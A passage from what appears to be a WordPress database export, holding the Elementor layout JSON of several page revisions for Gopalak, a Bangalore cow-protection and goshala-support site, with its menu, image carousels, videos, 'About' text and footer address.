":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10577,1759,'_elementor_page_assets','a:0:{}'),(10579,1760,'_elementor_edit_mode','builder'),(10580,1760,'_elementor_template_type','wp-page'),(10581,1760,'_elementor_version','3.7.8'),(10582,1760,'_wp_page_template','elementor_canvas'),(10583,1760,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10584,1760,'_elementor_page_assets','a:0:{}'),(10586,1761,'_elementor_edit_mode','builder'),(10587,1761,'_elementor_template_type','wp-page'),(10588,1761,'_elementor_version','3.7.8'),(10589,1761,'_wp_page_template','elementor_canvas'),(10590,1761,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":